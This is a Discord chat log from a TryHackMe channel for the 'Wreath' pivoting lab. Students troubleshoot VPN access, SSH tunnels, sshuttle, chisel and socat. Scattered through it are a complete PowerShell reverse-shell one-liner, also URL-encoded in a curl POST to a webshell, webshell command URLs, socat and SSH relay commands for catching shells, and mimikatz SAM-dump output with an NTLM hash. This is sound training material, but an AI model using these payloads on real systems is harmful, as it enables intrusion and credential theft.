wasn't the breakpoint 9999 for non-root users?

or was it 999

no 15000

It is part of an initial task to scan the target host for open ports.
It is mentioned to use > 15000 for your activities

oh, so specifically for wreath

That's 1-1023

yeh, that one

BTW, for Kali after a recent update.
That limited was removed.

🥲

Oh, interesting

so now any other user can user port 80 and the like?

oh wait maybe a firewall rule

yeah now it worked

it worked finally

thx for you support

Yeah, because elephants with no sense of subtlety coming at it from an individual CTF environment kept overwriting the bloody thing because they didn't realise it was destructive

Can't remember if I did the id_rsa file as well, but either way it's unlikely to get updates anytime soon

yes you did

i tried it

but for some reason back when i did it the first time it was completely fine copying it from the nc reverse shell and this time it didnt work

strangely, when I completed wreath, I didn't run into any issues that needed resets, guess trolls have increased

somebody shutted down the prod server once

I think some people do it over a longer amount of time and so they are more likely to get trolled.

Yeh, might be

This port forwarding/proxying stuff is making my head spin lol, been sticking with it and have decent notes but when it finally comes to running the commands so that I can ping the internal machine from my Kali VM im so lost, is there a video walkthrough of this room where they show the commands being run in the various shells/terminals to finally have internal access? Not looking for the one already provided where they really only read the prompts

hello guys

can someone help me in this lab?

Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?

I've tried all possible ways and I didn't get an answer.

windows fundamentals 1

exercice 3

@remote harness This channel is for the Wreath network on tryhackme. Please use #room-hints

Hey guys

Im currently on the web exploitation task, ive successfully gained a reverse shell from the server as root

A question requires me to submit root user's password hash, but when i submit it, it says wrong answer

I cant think of what went wrong since i have a stable reverse shell with root privileges and cat /etc/shadow works just fine, but the question is not accepting the answer

Struggling alot with SSH on the first compromised machine. Gives me error:
Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
I've copy pasted the SSH key, and made sure that there are no extra spaces inside of it multiple times.
I've tried making a new user on the machine, and SSH-ing to it, but it still won't work.

i fixed it:

1. Make new file: authorized_keys2
2. Copy paste id_rsa.pub into it
3. Nano /etc/ssh/sshd_config
4. Change AuthorizedKeysFile to .ssh/authorized_keys2
5. systemctl restart sshd

So, in other words, screw it up even more for other users?
Go for a reset -- that will revert the original damage and allow everyone access to it

can i change the /etc/ssh/sshd_config file to authorized_keys to fix it again? .__.

i mean, i couldnt really find another fix, i've had this problem the last 2 days now

i've voted for a reset 👍

Hey there, hope everyone is healthy. I need help regarding the network - When I start the network (like I did 10 minutes ago) and waiting for 5+ minutes for services to be run completely, scanning the IP and I found that port 10000 is not open. This thing is repeating on my end. Am I making some mistake? Please help, thanks.

Scanned the port but it seems to be closed.
P.S. I am already connected to network ovpn file.

I had the same issue, people were trolling and changed the password I guess. Just move on past that Q for now and the password will eventually reset

So Im trying to get thru the pivoting section but Im unsure of rlly what to do I have all my notes but when it comes to actually pivoting and hitting the internal network im a little lost still. I understand there's basically proxying and then there's port forwarding. Im assuming for this room proxying is preferable since we can send all types of traffic thru a proxy as opposed to just a single ports worth of traffic would this be correct? Like for example, Okay, I have my shell on the compromised server, now I want to get some enumeration goin to see whats on the internal machine, but nmap wont work thru a proxy, and I dont want to setup a port-specific port forward because I dont actually know whats running on the internal server yet, what's the general first step here ? Setup a proxy and then manually enumerate if that makes any sense?

Ahh alright I read ahead now an I see the 'intended action' is to get your proxy/portforward setup and THEN upload an nmap binary to the target to scan

anyone suddenly unable to work on Wreath?

anyone alive?

hey guys, 404 page found when i wanna download my wreath-vpn file.

Leave the room and rejoin

sorry dude, but that's not working. i tried twice. (leave room, rejoin the room, download configuration file, regenerate, but 404 not found). Should i have vpn file that machine's vpn file to access wreath network? I didn't understand.

I still can’t any machines to respond after being halfway through the room

What I had to do was leave the room, wait about 10-15 minutes and then rejoin. Just had to give it some time in between

Hmm, Okay i will try, thx

Gave +1 Rep to @urban vortex

Is the network still running? Check at the top and see if you need to extend the time or start it again

Yeah I tried that. It says it’s running, but I get to route to host

And machines don’t respond

Something is wrong. We'll look into it. 🙂

Interestingly, I can’t see the gateway anymore either

Try restarting your ovpn connection

that's a good idea, but i've tried that a few times

Hm, I did notice a issue with mine not being able to run the exploit on the first machine. But that is all I can think of sorry I can't help more

yeah no worries

i really think it's their end, because the VPN dies by itself after a while

It could be someone else in the network that touched something they shouldn't of. I did notice some ports open that weren't suppose to be so theres that too

that's my guess

it's possible someone's being a jerk

Can always vote for a reset as well or just wait it out for a bit, try again later

i read on reddit it happens

well, that's what im doing... letting the timer run out.. it's got 26min to og

@blazing rock you must have a power tool for this? Or may be Al? 😂

(sorry, i miss home improvement.)

Gives a whole new meaning to PowerShell™️

hahhahahaha

awesome

https://tenor.com/view/more-power-home-improvement-tim-allen-drill-gif-16749349

In the mean time you could try some other online rss to break into while you wait

yeah, i just had lunch and sipping a coffee while reading

The timer on a network is different from a single room. It does not terminate the network when it runs out, it puts it to sleep (stopped, safes the network state). A Reset would be needed to get the network in your subnet back to its original state. 🙂

oh no... what can i do?

... to effect a reset for the room or myself?

thank you for clearing that up

Gave +1 Rep to @blazing rock

Hit the Reset button for the Network to reset, when it reaches the required number.

that's helpful; but it means i am dead in the water for the forseeable future

@merry robin Was the fix usually just leave and rejoin? Is it worth pinning that like the FAQ?

You can add an additional reset vote every hour

That is what Muiri told me to do, but originally I tried waiting 10-20 minutes it didn't work, then after the weekend I came back on sunday night and it worked. Not sure if it had went through a reset at that point or not but it took some time

so, click once an hour for the next six hours? there must be a more efficient way to to fix this issue?

We're looking into changing the reset requirement for Networks, but that does not help you at this moment. 😄

that vote is for everyone working in the room right? So 6 different people have to vote or you vote 6 times yourself over 36 hours?

i added +1 to reset machine.

Are you in 10.200.8.x?

i am 10.200.105.x

i'm not in 10.200.x tunnel. but i can add a vote for reset

You need to be on the same subnet

105 holy moses. That's a lot of networks 😄

Otherwise you're resetting a network without cause

That's across wreath, throwback, and holo though right?

Pretty sure I was wrong on this as I am 3/8

😦 5/6 for me

2/8

so we're all on different subnets lol

can you still connect to your vpn?

I can yes. Im on 84 subnet though not 105

neat. mine connect now.

it authenticates and then stops... hmmm..

Could attempt to download a new config file and see if that fixes it

yeah, ill try that again

That would be an Ashu question. 😄

It is across all networks, yes

Wreath subnets start at 72 and go up to 120 or something iirc

I've been really enjoying Wreath 🙂

Wreath got me stressing at some moments but overall very informative

At some point I may see about updating it. I also have an additional "ultimate" pivoting technique that I couldn't really use in Wreath, but that I'm now good enough with docker to containerise

BTW, I have got Holo at 10.200.115.x

If I get a weekend I'll add that as a standalone extension I think.

any ideas on these technical issues?

👍

I have a feeling I've seen Wreath at 65 as well tbh. I have a sneaky suspicion the entire system may be screwed

Ultimate pivoting aye? Do tell 👀

Which technical issues?

10.200.8.x 😎

all the machines stopped talking, and i get no route to host the rest of the time

Effectively a manual equivalent to sshuttle, that doesn't require Python and works with UDP traffic too

yes it's subnet that i own.

It's now resetting.

Reset. Sounds like someone has been messing with the boxes

oh boy.

I had and possibly still have Wreath in 10.200.54.x 😄

Is it similar to TProxy?

It's entirely manual, so, unlikely.

that sounds fascinating

No actual tools involved. Just networking knowledge.

Ah, my mistake, still learning lol

Nah, no mistake 😄

Now you got me curious and googling some UDP things

yeah nah

I have a problem. I cannot download vpn file for wreath network. ? Why is it? I can share my screen with anydesk or discord etc.

Did you try the leaving the room, waiting for a bit and rejoining?

yes i waited 30 minutes without in room.(i leaved the room)

after that i rejoined in but not working.

there really needs to be a master reset button

i will try last time for leaving and rejoining?

because at some point this gets impossible to troubleshoot when you're not even sure if the system is working.. at least with a reset you get a baseline

What do you mean?

well we have 3 people with different problems, and we're at the mercy of this system we can only click once an hour

so it's hard to know whether our issues are our own, or the networks, or both. It sounds like consensus is that it's the network.

You're on different networks.

-ban @arctic sluice -ddays 1 Nitro Scam

🔨 Banned 4stro__#9323 indefinitely

James quick with the hammer

that too, makes it even harder

yes, thanks for that

Gave +1 Rep to @urban vortex

probably malware

It definitely is.

Hey so I just ran my nmap scan from the first compromised webserver, I see 5 machines up via the nmap -sn scan but the question wont accept my answer? is there something I did wrong here

oh, there are some you need to skip

Says the network diagram up top is a giveaway but then why am I seeing 5 hosts up

Oh really

because they are out of scope

ohhhh

man, yours is working! im so jealous lol

I was promised one a year ago and I still don't have it 😆

Did you read the scoping document?

oh, don't mind me... im just being a crotchety old man

Yes I did, its just been a few days that Ive been working on this after work and I forgot there was an intended scope

once the work day ends and I get on THM I just assume all machines are in scope lol

i had to reread it a couple times too

my b

I would, uh, suggest not doing that IRL 🤣

no. that there is a "career-limiting move"

I obviously couldn't perfectly emulate a real pentest, but it's designed to simulate one in many ways (the writeup format rules, for example)

Right right I understand

and the out-of-scope part seems realistic

Worked thank you :))

Gave +1 Rep to @urban vortex

perfect

for fun, i tried it from two other machines.. just to be sure it wasn't my vm. definitely an issue with the room. someone tampered.

We're looking into this issue. 🙏

I solved this problem, just leaving room and wait for 15 minutes after that rejoin the wreath room and download vpn file. and it works. finally i connected wreath network.(another subnet)

Cool, I was about to say to try again. 🙏 Problem should be fixed.

Thank you for your effort.

Gave +1 Rep to @blazing rock

The 10.200.8.x subnet was being a jackass. 😄

do you have time to take a peek at the 10.200.105.x?

I sent the request in to reset it. 🙂

You’re amazing

https://tenor.com/view/home-improvement-fire-blow-fail-gif-8488333

I remember that episode.

good times 🙂

My hair almost caught on fire.

Hey all. Apologies if this is rambly nonsense. I finished Wreath last week and had some questions about how the network is structured. (Potential spoilers ahead!)

The image linked represents the different communication channels I had to each machine at the end of Wreath.
I was wondering what mechanism was preventing direct access to ||wreath-pc from the prod-server? (As traffic had to be tunnelled through git-serv).||. Similarly, that mechanism seemed to operate only in one direction? As at the very end, ||we are able to establish a reverse shell from wreath-pc straight back to our attacking machine, which is in an entirely different (sub)net!?|| Was it just routing rules on 10.200.x.1?

I'm a networking noob so any explanation is appreciated. Cheers!

P.S. the network was a fantastic learning experience, thanks @merry robin.

Gave +1 Rep to @merry robin

Technically speaking: AWS security groups. "In world" (and irl if this network was actually someone's home-office network) firewalls and/or subnetting.

Ah gotcha, cheers. So IRL, the subnetting would be obvious based on addresses? And the firewalling would be done on the router?

Kinda.
The best way to think of it from a "real" perspective would be to have the prod server in a DMZ segregated by a hardware firewall allowing access exclusively to the git server in the internal network. Then the git server and pc in a LAN together behind said firewall.

If I was building the same network locally, that's how I would do it, personally 🤷‍♂️

Yep, perfect, that connected the dots

Thanks @merry robin!

Gave +1 Rep to @merry robin

Np :)

Can anyone help regarding this?

I just started the room. However, the attack box can't even ping the server IP provided. I tried downloading the openvpn config file. But it just returns a 404 and wont actually download. Is there something wrong with the server or did I just miss something?

have you tried scanning just port 10k? i just tried it with rustscan and it worked fine

with the attackbox, there's a config folder on the desktop

have you tried the vpn profile for wreath in that foldeR?

just curious... i get this error when running socat "error while loading shared libraries: libwrap.so.0: cannot open shared object file: No such file or directory" is that fatal for socat?

Hello anyone who are doing wreath .
I am login in the vpn area of wreath and can't ping the 10.200.90.200 IP
it doesn't respond to my nmap scan anymore
i try to comment the line in /etc/hosts but nothing
anyone have a clue ?

can you copy+paste what you're seeing?

@wide tartan

Try a static binary, did you just use the one available on your system?

haha yes, now i feel silly.

Yes i try to figure out some screenshot

oh, i strongly reccomend flameshot

https://flameshot.org/

sudo apt update && sudo apt install flameshot

it's available for windows and macos too

yes iI was installing during this time ahah

ok that looks ok

oh, its commented out

ok vpn is good

Yes i comment it on purpose

ok, that's alright

and when you ping the ip, what happens?

ok i don't what happened before

now it works

lmao sorry for wasting your times

never! sometimes talking it out is the answer 🙂

I don't know what happened before

my etc host was not commented

and it was unreachable

🤷‍♂️ that's technology. sometimes we never know why things happen.. it's the trying to learn that matters 🙂

hahaha I agree on the learning point

Perhaps, the network was sleeping 😅

It can happened ?

It is possible, it might have been the case for your previous try

I don't really get how works the network area

like if there is no hacktivity

the vm shutdown

This. I have had this happen twice to me... working away, network sleeps, and then I'm confused until I check lol

Make sure the network is in Running state while working on it and keep extending it's time if you are working on it

that's a learning environment thing. In the real world networks don't sleep 🙂

Yes I have checked it and i t was Running

Yes for sure

anyway thanks dude

https://tenor.com/view/bros-the-office-love-fist-bump-gif-13830753

+rep @cunning island

always dude

Gave +1 Rep to @cunning island

+rep @lusty saffron

Gave +1 Rep to @lusty saffron

thanks for the static binary thing

i actually laughed outloud lol

totally what i get for being lazy lol

Haha, I now keep a bunch of static binaries laying around.
socat, nmap, chattr, ...

yeah, that's clever

https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64

+rep @oblique oar

Gave +1 Rep to @oblique oar

Did we reach 13 votes on the 10.200.90 network or did the network just drop?

I was in the middle of setting up the reverse shell relay and it just goes down, I get that if it detects no network activity itll go to sleep but im like actively working on it lmao

That, uh, isn't dynamic. It goes to sleep if no one clicks the "Extend" button -- it's not checking for network activity.

I see I see. I Misunderstood but just the wording here made me think it was dynamic in some respect. I will be sure to hit the extend button from now on

-ban 823910237664706640 -ddays 1 Nitro scam

🔨 Banned 823910237664706640 indefinitely

@fair breach Sorry, but it didn't work.
You used --ddays and ddays, didn't Muiri check it😄

Yeah I was on mobile cycling down a road at the same time

dodging all sorts of wasps and flys LOL @lusty saffron

ty for ping

Can we please get an extension on 10.200.90.0 network? Im in the middle of C2 stuff and there's 12 min left on network and it wont let me extend the time

Hello everyone! Im stuck on Git Server Stabilisation & Post Exploitation. Can't rdp to git server 🥺

Hello folks! I'm on task 6 trying to exploit the machine, but it gives me an error "Failed to connect". I checked the IP address and tried to ping and it works. Why does it fail?

Click the start button

The machine is stopped

Is it? For me its up

It's working now. Still don't know what was the issue, but it's fine 🙂

Hi there, I am using proxychain with ssh -D 9050 to scan the .150, didn't get any open ports found. Anyone has the same issues as me?

Anyone know how to resolve a 404 error everytime I try to download wreath network vpn config file?

Can please someone help me? I'm stuck on getting rdp to the git server

connection lost 😦

HI there, I am currenlty using proxychains dynamic port forwarding method to do the boxs, any idea how I can run the exploit? if I am using proxy chain

Hey all, trying to run mimikatz on the git-serv machine and everytime I run it using . ./mimikatz.exe it just spams out and im not sure how to get it under control here.

Why do you think you were told to use RDP?

RDP didnt work

I was trying other options

Evil-WinRM shells are pseudoshells -- they're simulated. That has some... interesting... side effects. You can get around it by entering the commands as arguments to the binary, although it may still be a little strange

Ahhh hmmm alright

Well I would prefer to use RDP but kept getting a connection failed error so I defaulted to evilwinRM, didn't realize that would be an issue

Is there another alternative method you'd recommend to get mimikatz working other than RDp or evil-winrm, been kinda stuck for most of my morning

Could try PsExec, although that isn't an interactive shell either. Also can't remember if I left SMB open or not

The other problem with PS Remoting is that it tends to execute commands in a medium integrity process if you're not using the default Administrator account. PsExec gets around that at least

Hello. I bought 1 month subscription from Tryhackme site. My card was charged but it seems that I am not a member

help me!

Speak to support 🙂

!email

Alright I will try some more alternatives. Any tips for why xfreerdp just fails to connect, could that be from too many ppl xrdp'ing at once?

Nah, I removed the limit

Will depend on what the error is

oh wait im so dumb

I used the wrong IP

lmao

That would do it

I knew it

god damn facepalm

Hey so just FYi, the wreath room accepted my Admin NTLM hash answer as the correct answer when it had a typo in it, just wanted to bring it up, had me stumped for some time until I realized it

That's answer tolerance, a few typos are accepted in the answer😄

95% tolerance IIRC

Ahhh alright

I was not aware

$client = New-Object System.Net.Sockets.TCPClient('10.200.101.200',16001);

New-Object : Exception calling ".ctor" with "2" argument(s): "No connection could be made because the target machine
actively refused it 10.200.101.200:16001"

Hi there, I am trying to set a reverse shell with Powershell but the 1st line didn't work for me.

I have already done the following in centos machine
firewall-cmd --zone=public --add-port 16001/tcp

ssh -R 10.200.101.200:16001:127.0.0.1:4444 -i id_rsa root@10.200.101.200
[root@prod-serv ~]# netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 1827/perl
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 853/sshd
tcp 0 0 127.0.0.1:16001 0.0.0.0:* LISTEN 2121/sshd: root@pts

Anyone know how to make the one in bold 0.0.0.0

None of those are in bold?

edited,I am trying to use 16001 as a port to listen to reverse connection and forward to 4444, but it am stuck here, its show 127.0.0.1, how can i change it to 0.0.0.0

So I’m evil-winrm into .150 and I’m trying to download Website.git to my local machine and it saying it downloads but then it’s nowhere to be found on local.

Anyone run into this issue?

**What is the Administrator password hash? 8846f7eaee8fb117ad06bdd830b7586c
**
For one of the question I entered the hash correctly but it still mention it is wrong?

mimikatz(commandline) # lsadump::sam
Domain : GIT-SERV
SysKey : 0841f6354f4b96d21b99345d07b66571
Local SID : S-1-5-21-3335744492-1614955177-2693036043

SAMKey : f4a3c96f8149df966517ec3554632cf4

RID : 000001f4 (500)
User : Administrator
Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c

How about using rdesktop? And copy the files via the shares.

Did you specify a destination on your local machine for it to go?

I did I believe my command was: download Website.git /home/user/wreath

I think there's a bug where it can misbehave if you don't specify the full path to the source

Ohhh thanks! I’ll give that a try!

Gave +1 Rep to @strange bison

hi there :), i need help with task 17. im trying to upload the static nmap binary to the first machine but without success... each time im getting the error "failed to execute command", i tried to follow the guide and even other techniques but nothing seem's to help. i saw some answer of someone that say's that this error happens if you dont upgrade the shell to an interactive one, but when i try to upgrade it with python3 -c 'import pty; pty.spawn("/bin/bash")' it gives me the same error:(. im very tired from this issue and i will really appreciate some help.🙌

python -c "import pty; pty.spawn('/bin/bash')"

Try this to stabilize

So my wreath network ran out of time, i restarted the timer, and now I cannot even ping the first host. Does anyone else have his issue?

it's not working, i said in my message i already tried it. i just tried it with python3 because python isnt installed on the machine... i still hope someone here got the same error and know's how to fix it, im stuck on this one for more then a week...😢

python isn't installed on what machine?

on the machine we hack into with the first exploit

on task 6

the webmin server

so you ran the initial CVE exploit, typed "shell" and connected to your kali or attacking machine yes?

for a while I was getting the "failed to execute command" as well actually and I just had to restart the whole VM, reconnect and give it some time in order for it to work properly. Its the same issue I am having now actually

wdym typed "shell", and on this problem about a week and i tried already to restart the vm and even tried it from another computer and still with no success

thanks for the help btw 🙂

the "shell" is if you used the CVE python file to initially exploit the first machine

well actually do you have the rsa key to the first machine?

i dont think i have it...

i just dont understand why it isnt working like the guide, it must be some sort of bug

the network can be funky sometimes. sometimes all you can do it wait it out and give it some time which what im currently doing

try to let the timer run out without being connected to the vpn, then restart the network and reconnect with the VPN. That seems to fix most of my issues

@urban vortex man your the best!!! you just solved my problem

thank you so muchhhh

Glad I could help

was it the timer running out that fix it?

no i just didnt used the "shell" connection😆

i cant believe it was that simple lol

ah okay lol it happens well if ya get stuck again ill be around im on task 32 right now waiting it out

cool 🙂 thanks again🙌

Gave +1 Rep to @urban vortex

he deserves two😝

@stoic flicker @merry robin

-ban 155098424910282753 -ddays 1 discord nitro scam

🔨 Banned 『ᗪᙢ』Ghony#5788 indefinitely

Hey all, trying to pivot into the final Personal Machine. I have my notes on setting up a chisel forward proxy and I've set a port on the gitserver firewall to allow traffic. I think Im just having a little trouble understanding which port needs to go where. Heres some output of what I have right now

Chisel client

Chisel server (gitserver) Listening on port 22123 which I opened on the firewall

Here's my foxyproxy settings but I still cannot hit the personal PC's webserver on 80

Im not sure that my command for the chisel client is correct the syntax , based off my notes is ./chisel client TARGETIP:LISTENPORT PROXYPORT:socks I used 22123 both as the listen port and proxy port, I wasn't sure if the proxy port was arbitrary or if it needed to be the same as the listening port since 22123 is what I opened on the firewall

So from my perspective, I believe the chisel server is setup right, listening on port 2213. Then I successfully connected my chisel client. that is connected. But I think either my proxy port is wrong + my foxy proxy settings are wrong. Is the proxy port arbitrary?

So I changed the foxyproxy IP to that of the Gitserver, and I was able to load a page but this doesn't seem like the right thing. Something must be off here right?

Alright the issue seemed to be my proxychains4.conf. not sure why mine is called proxychains4.conf when every example I see its just 'proxychains.conf' So I changed the name of mine to match. Also since the current directory is the first place that proxychains looks for proxy configs, I've copied proxychains.conf to my working dir (where Im running chisel client from) Ive setup my foxyproxy to socks5 on 127.0.0.1:1337. My proxychains.conf file is below. However, with all this set I still cannot hit these webserver on 80??

I can ping 10.200.96.100 from my local kali terminal but I cannot get access the webserver on 80 still hmmmm

I got it!

Oh my goodnes lets gooo haha

sry for everyone that has to read this gibberish. I would delete but It's important to see that 1. I failed to type 1337 in for the PROXYPORT in the above command. 1337 is the port that is configured in proxychains.conf. Make sure your proxychains.conf file looks like mine there and then make sure you make a new foxyproxy proxy. Make sure you choose the proxy type as SOCKS5. I made the mistake of just arbitrarily naming mine "SOCKS5" so dont doo that lol

Just completed wreath! woooo

Only too like what, a week and a half. Studying after work and over the past weekend. I'll be honest I didn't do most of the bonus questions only because I knew they would send down a rabbit hole that was way too long. But otherwise I tried to stay tru to the room. My main goal was to just get a basic understanding on how SSH tunelling works and it overall was a good experience seeing myself pivoting thru 2 machines!

can anyone help me reset the wreath network pls

When you're asking for a reset, you need to specify what instance you're on.

The third octet of the machine IPs

hi guys, im trying to use sshuttle to connect to the second machine in task 18.
i tried it myself with no success so i saw the youtube walkthrough of DarkSec and he used this command:
sshuttle -r root@10.200.87.200 --ssh-cmd "ssh -i id_rsa" 10.200.87.0/24 -x 10.200.87.200
i tried to do the same thing but i got this error:
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.
^CFailed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.

i tried to flush my dns records but with no success either, im using kali linux and i saw flushing tutorial's for ubuntu and red hat and it didnt work.
if someone knows what the problem here and can help me fix it it will be great 🙂
thanks in advance

i saw i can flush dns records in the browser as well, do you guys think it will help me in this case

?

@strange bison

-ban @surreal sail Game phishing. Secure your account and then appeal this ban by emailing bans@tryhackme.com

🔨 Banned Willy12u#8465 indefinitely

anyone with clues about why it asks for a password when provided with a key at the first machine?

Show your command please

Usually the key file has wrong permissions or format.

i use the command "sshuttle -r root@10.200.105.200 --ssh-cmd "ssh -i id_rsa" -N"

^sshuttle -r root@10.200.105.200 --ssh-cmd "ssh -i id_rsa" -N^

Someone might have removed the key too

i just checked that the file is on the server

can it be because i just copy pand paste the file? shouldn't be the problem right

That doesn't check if the corresponding public key is still authorized

Make sure there is an empty line after the key.

ok because it's the id_rsa i need on my end, right? not the .pub?

yeah.... but you should check the authorized_keys file as that one determines if your private key allows you access

alright, are the id_rsa.pub supposed to be identical to the one in authorized_keys? because right now it's not

think so yeah

just also think it is supposed to be able to hold multiple keys in that file

so make sure that you only add the key instead of wiping the contents of the authorized_keys file

well since i can't change it then how could somebody else o_O

You can change it as you're root but it's designed so that it's difficult to do.
Reset the network

maybe something is wrong in the room itself?
im having the same problem i just cant make an sshuttle connection to the machine and even if i just try to ssh to the compromised server with ssh 10.200.87.200 -i id_rsa im getting this error: root@10.200.87.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

It's not an issue with the room, it's an issue with people breaking it intentionally or unintentionally.

that's a shame... is there nothing to do?

^

actually my key is identical so i dont need to change the authorized keys file, but it still doesnt work...

Which key is indentical to what?

the public key is in the authorized keys file

but i guess someone really did something there because in all the videos and write-ups of this room this problem hasn't happened

it a shame a really wanted to complete this room, saved up 7 day streak to get it...

Yes, it's very common

Like I said, reset the network.

i need more votes to reset the network, got 2/8

You can add a vote every hour.

oh, thanks! i will do this

Gave +1 Rep to @strange bison

Hello I am not able to download the vpn connection pack to the wreath network

I get a 404 when I try to download it

I’ve joined the wreath network and everything

Still not able to download the vpn file for the wreath network

You gotta leave the wreath room, and give it some time like at least 30 minutes to an hour and then re join the room and try to download again

Okay I’ll give that a go

Thanks for the help

That let me download the config file

Random… but I appreciate it

its a weird fix but its like giving a reset to the connection of it for some reason

http://10.200.101.150:8000/resources/uploads/remote-desktop3.png.php?cmd=net user Administrator

CommentType a password for the user: Retype the password to confirm: i am getting this output on the webshell console

Anyone else having issues with the id_rsa permissions when trying to ssh with it

I’ve done this tyoe of persistence previously so I know my steps are solid

But I get a permission error

I’ve done chmod 600 id_rsa and stuff

Steps have been followed to the T and still errors

@stoic flicker @merry robin

-ban 473211379151536149 -ddays 1 Your account may have been compromised by a nitro scam, and is now attempting to scam others. Please change your passwords and add multi-factor authentication before emailing bans@tryhackme.com if you wish to return.

🔨 Banned shimmy shimmy ya#8721 indefinitely

thanks for the heads up

Gave +1 Rep to @cursive minnow

no worries 🙂

ssh -L 16000:10.200.101.150:3389 root@10.200.101.200 -i id_rsa

I hope this would help

chmod 600 id_rsa

If the key has the wrong permissions, you get a giant banner telling you that.
Permission denied by the remote server does not mean wrong permissions on the key on your local machine.

-ban @still maple -ddays 1 Scam links

🔨 Banned rodri_silva18#4667 indefinitely

@strange bison

-ban @slim eagle -ddays 1 Your account has been compromised and is being used to send phishing scams. Please secure your account and then appeal this ban by emailing bans@tryhackme.com

🔨 Banned Sunderw_3k#7418 indefinitely

I’ve done this type of attack before and chmod 600 id_rsa is what I’ve usually done and also what is said to be done for this challenge as well

@hallow merlin I’ll give your method a go in a bit

guys for some reason i cant get a connection to the machine's in the network

i tried to ping 10.200.57.200 but with no success, i have restarted today the network and i used the vpn file and i saw the the netwrk is up for half an hour but still i cant even ping the first machine for some reason...

earlier today i did manage to connect to the network and i got to task 22 but now i just cant manage to connect again to any machine

after the network was restarted the ssh portion works now... just an FYI

The method I used"

1. Go to access 2: Regen VPN 3. Download again, incase of any issue in connectivity

Hey guys, I'm currently in the task GitServer-Exploitation, leading upto this, i have all the required ssh keys and the correct exploit for the next attack. But due to some reason, the python exploit fails and it says the following:
+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository test.txt
[+] Add user to repository
[-] Cannot add user to repository
I've cross checked every instruction from the above task and I've also watched the video walkthrough attached to it. They all are getting shell easily, But my exploit fails. Can anyone help me with that?

This is the full output:
──(kali㉿kali)-[~/ctf/TryHackMe/Wreath]
└─$ ./*****.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository test.txt
[+] Add user to repository
[-] Cannot add user to repository

Working through Wreath and trying use Burp to get the reverse shell from X.X.X.200 to X.X.X.150. Converted Powershell command using Ctrl + U yet I am not able to catch a reverse shell. Ncat shows it's listening on same port as in Burp script and only changed IP and Port. Any suggestions?

Caught it! Never mind

Double check your exploit and make sure it’s configured correctly

I'll try this later, thanks btw :)

Gave +1 Rep to @urban vortex

i can't download the wreath vpn key.. getting a 404 on the download page.. anyone have this issue ?

@merry robin I really think troubleshooting needs to be pinned for this

I really think it needs fixed

But by all means, you'll know the troubleshooting better than I do

Is it not just leave and rejoin, then regenerate?

I believe so

I'm getting this same error as of the last 5-10 minutes

Leave the room, wait 10-15 min(s) and then re-download a script.

Good evening.

I'm currently on Task 20 and I can get the reverse shell to work with the "Port Forwarding -- Easy" technique. Now I try to use the "Port Forwarding -- Quiet" technique but I can't get it to work.

On kali I do :
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

On prod-serv (10.200.181.200) :
./socat tcp:ATTACKING_IP:8001 10.200.181.150:80,fork &

curl -X POST http://10.200.181.150/web/exploit-toto.php -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.181.200%27%2C80%29%3B%24stream%20%3D%20%24client. GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream. Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System. Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29. Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"

Git-Server (10.200.181.150)

Is there a kind soul to help me ? 😄

make sure your porwershell command is set up correctly cause your socat commands seem fine to me

Hello

i am looking for some help during the pivoting task i test sshustle / chisel / and socat and it won't work any idea ?

How are you testing them and what's not working exactly?
I found sshuttle to be the easiest

sshuttle -r root@10.200.87.200 --ssh-cmd "ssh -i web_server_id_rsa_root" -N -x 10.200.87.0/24

c : Connected to server.
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.
This is my command for sshhuttle

i am doing this from my kali machine

Thanks for your help ! 😄 I use the ps script proposed by THM :

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding). GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text. encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

I run it from the prod-serv and use curl with -X POST and http://10.200.181.150/web/exploit-toto.php

For your information, here is a diagram of my configuration

Gave +1 Rep to @urban vortex

@urban vortex Does Socat work like netcat? When the target responds, it should display the shell? Is there anything else to configure other than socat between my local machine and the compromised server?

And I don't need to open a port on the server that serves as a gateway?

on the server you want the shell on, in order for connect back to your machine, you will need a port to connect back to. so yes, open one

